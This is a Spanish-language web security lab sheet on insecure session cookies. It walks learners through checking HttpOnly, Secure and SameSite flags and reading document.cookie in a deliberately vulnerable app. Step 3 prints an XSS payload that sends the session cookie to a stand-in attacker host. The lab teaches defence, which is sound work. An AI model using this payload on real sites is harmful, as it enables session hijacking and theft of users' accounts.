Laboratorio 06: Gestión de Sesiones Insegura
🎯 Objetivo
Analizar la configuración de las cookies de sesión y comprender cómo la falta de atributos de seguridad (HttpOnly, Secure) expone la sesión al robo.
📋 Prerrequisitos
- Sesión activa.
- Modo Vulnerable activo.
- Herramientas de Desarrollador del navegador (F12).
📝 Instrucciones Paso a Paso
Paso 1: Inspección de Cookies
- Abre las herramientas de desarrollador (F12).
- Ve a la pestaña Aplicación (Chrome/Edge) o Almacenamiento (Firefox).
- Despliega la sección Cookies y selecciona
localhost. - Observa las columnas
HttpOnly,SecureySameSitepara la cookieuser_idosession.- En modo vulnerable, deberían estar vacías o marcadas como inseguras.
Paso 2: Acceso vía JavaScript
- Ve a la pestaña Consola.
- Escribe el comando:
document.cookie - Si puedes ver el contenido de la cookie (ej.
user_id=1), significa que es vulnerable a robo mediante XSS.
Paso 3: Simulación de Robo
- Imagina que has encontrado un XSS (Lab 03 o 04).
- El payload para robar esta cookie sería:
<script>new Image().src='http://atacante.com/?cookie='+document.cookie;</script>
🏁 Verificación
- Confirmar que
document.cookiedevuelve valores sensibles en la consola.
🛡️ Preguntas de Reflexión
- ¿Qué impide el flag
HttpOnly? - ¿Por qué es importante el flag
Secureaunque la red interna sea "segura"?